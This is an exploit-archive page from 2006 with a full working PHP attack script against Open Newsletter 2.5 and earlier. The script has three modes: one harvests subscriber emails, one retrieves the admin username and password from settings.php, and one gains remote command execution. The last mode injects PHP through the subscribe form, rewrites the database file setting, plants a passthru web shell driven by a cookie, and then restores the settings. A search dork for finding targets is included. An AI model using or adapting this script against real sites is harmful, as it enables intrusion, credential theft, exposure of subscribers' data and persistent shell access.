Open Newsletter <= 2.5 Multiple Remote Vulnerabilities Exploit (update)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Open Newsletter <= 2.5 Multiple Remote Vulnerabilities Exploit (update)
# Published : 2006-12-23
# Author : BlackHawk
# Previous Title : Pagetool CMS <= 1.07 (pt_upload.php) Remote File Include Vulnerability
# Next Title : Ananda Real Estate <= 3.4 (agent) Remote SQL Injection Vulnerability
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "rn";
echo "Open Newsletter <= 2.* Muliple Vulnerabilitiesrn";
echo "Site: http://www.selfexile.com/projects/opennewsletter/rn";
echo "Dork: "This is a Free & Open Source mailing list manager"rn";
echo "by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>rn";
echo "Thanks to rgod for the php code and Marty for the Lovernrn";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Relatedrn";
echo "Host:		target server (ip/hostname)rn";
echo "Path:		path to Open Newsletterrn";
echo "AttackType:	1 - Subscribers Email retrievern";
echo "		  |-> Related: Nonern";
echo "		  |-> Es: php ".$argv[0]." localhost /opnletter/ 1rnrn";
echo "		2 - Credential Retrievern";
echo "		  |-> Related: Nonern";
echo "		  |-> Es: php ".$argv[0]." localhost /opnletter/ 2rnrn";
echo "		3 - Remote Command Executionrn";
echo "		  |-> Related: Nonern";
echo "		  |-> Es: php ".$argv[0]." localhost /opnletter/ 3 dirrnrn";
echo "rn";
echo "";
die;
}

/*
---

Ver 1.1 - fixed for mq=on

---
Some one told me that this was absolutely a very good scritp..
i think that the programmer nearly do not know PHP..
why? this is the only protection for admin files:
------------------------------------
	session_start();
	
	if($_SESSION["valid"] != true)
	{
	    header("Location: index.php");
	}
	
------------------------------------

do you remember that this one will only 'work' with normal browsers?
that the script will continue to be executed until the end?

this exploit only works with the conseguence of this..


Started programming: 18.31 22/12/2006
Ended: 19.39 22/12/2006

Merry Xmas and a happy new Hacking Year ^_^

BlackHawk <hawkgotyou@gmail.com>

PS: have some spear time? the 01/01 send me 'happy birthdate' emails ^_*
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}
  }
 return $exa."rn".$result;
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";


if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

switch($attack_type)
{
case 1: //Email Retrieve
echo "Attack No 1 - Subscribers Email Retrievern";
echo "-- Start of Result--rn";
$packet ="GET ".$p."subscribers.php HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
$dopo_campo = explode("<select class=textField name=email><option>",$html);
$prima_fine = explode("</option></select>",$dopo_campo[1]);
$emails = str_replace("</option><option>", "rn", $prima_fine[0]);
echo $emails;
echo "rn-- End of Result--";
break;

case 2: // Credential Retrieve
$usr_id=$argv[4];
echo "Attack No 2 - Credential Retrievern";
$packet ="GET ".$p."settings.php HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
$temp = explode("<input class=textField type=text name='admin_username' value='", $html);
$user_name = explode("' title='", $temp[1]);
$temp2 = explode("<input class=textField type=text name='admin_password' value='", $html);
$user_password = explode("' title='", $temp2[1]);
$temp3 = explode("<input type=hidden name=old_db_file value=", $html);
$database_name = explode(">", $temp3[1]);
echo "UserName: ".$user_name[0]."rn";
echo "Password: ".$user_password[0]."rn";
echo "Database Name: ".$database_name[0]."rn";
break;

break;
case 3: // Command Execution
$cmd="";
for ($i=4; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}

$packet ="GET ".$p."piggy_marty.php HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: cmd=".$cmd.";rn";
$packet.="Connection: Closernrn";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"69696"))
{
  echo "Exploit succeeded...rn";
  $temp69=explode("69696",$html);
  die("rn".$temp69[1]."rn");
}
$packet ='GET '.$p.'subscribe.php?action=subscribe&email=<?php%20$fp=fopen($_GET[nomeshell],$_GET[w]);fputs($fp,$_GET[shell]);fclose($fp);chmod($_GET[nomeshell],777);?> HTTP/1.0rn';
$packet.="Host: ".$host."rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
sleep(1);

echo "Attack No 3 - Remote Command Executionrn";
$packet ="GET ".$p."settings.php HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);

$temp = explode("<input class=textField type=text name='admin_username' value='", $html);
$user_name = explode("' title='", $temp[1]);
$temp2 = explode("<input class=textField type=text name='admin_password' value='", $html);
$user_password = explode("' title='", $temp2[1]);
$temp3 = explode("<input type=hidden name=old_db_file value=", $html);
$database_name = explode(">", $temp3[1]);
$temp4 = explode("<input class=textField type=text name='admin_name' value='", $html);
$admin_name = explode("' title='", $temp4[1]);
$temp5 = explode("<input class=textField type=text name='admin_email' value='", $html);
$admin_email = explode("' title='", $temp5[1]);
$temp6 = explode("<input class=textField type=text name='charset' value='", $html);
$chr = explode("' title='", $temp6[1]);
$temp7 = explode("<input class=textField type=text name='site_url' value='", $html);
$site_url = explode("' title='", $temp7[1]);
$temp8 = explode("<input class=textField type=text name='opennewsletter_dir' value='", $html);
$dir = explode("' title='", $temp8[1]);

$data="action=update";
$data.="&admin_username=".$user_name[0];
$data.="&admin_password=".$user_password[0];
$data.="&admin_name=".$admin_name[0];
$data.="&admin_email=".$admin_email[0];
$data.="&unsubscribe_link=on";
$data.="&charset=".$chr[0];
$data.="&site_url=".$site_url[0];
$data.="&opennewsletter_dir=".$dir[0];
$data.="&db_file=hello.php";
$data.="&old_db_file=".$database_name[0];
$packet="POST ".$p."settings.php HTTP/1.0rn";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*rn";
$packet.="Accept-Language: itrn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Accept-Encoding: gzip, deflatern";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)rn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closern";
$packet.="Cache-Control: no-cachernrn";
$packet.=$data;
sendpacketii($packet);
sleep(1);
$shell = '<?php%20error_reporting(0);set_time_limit(0);if%20(get_magic_quotes_gpc())%20{$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo%2069696;passthru($_COOKIE[cmd]);echo%2069696;?>';
$packet ="GET ".$p."hello.php?w=w&shell=$shell&nomeshell=piggy_marty.php HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
sleep(1);
$packet ="GET ".$p."unsubscribe.php?email=<?php%20$fp=fopen($_GET[nomeshell],$_GET[w]);fputs($fp,$_GET[shell]);fclose($fp);chmod($_GET[nomeshell],777);?> HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Connection: Closernrn";
sendpacketii($packet);
sleep(1);
$data="action=update";
$data.="&admin_username=".$user_name[0];
$data.="&admin_password=".$user_password[0];
$data.="&admin_name=".$admin_name[0];
$data.="&admin_email=".$admin_email[0];
$data.="&unsubscribe_link=on";
$data.="&charset=".$chr[0];
$data.="&site_url=".$site_url[0];
$data.="&opennewsletter_dir=".$dir[0];
$data.="&db_file=".$database_name[0];
$data.="&old_db_file=".$database_name[0];
$packet="POST ".$p."settings.php HTTP/1.0rn";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*rn";
$packet.="Accept-Language: itrn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Accept-Encoding: gzip, deflatern";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)rn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closern";
$packet.="Cache-Control: no-cachernrn";
$packet.=$data;
sendpacketii($packet);
sleep(1);
echo "Shell Created and Files Restored.. Now Try to execute command..rnrn";
$packet ="GET ".$p."piggy_marty.php HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: cmd=".$cmd.";rn";
$packet.="Connection: Closernrn";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"69696"))
{
  echo "Exploit succeeded...rn";
  $temp69=explode("69696",$html);
  die("rn".$temp69[1]."rn");
}
break;
}
?>

# www.Syue.com [2006-12-23]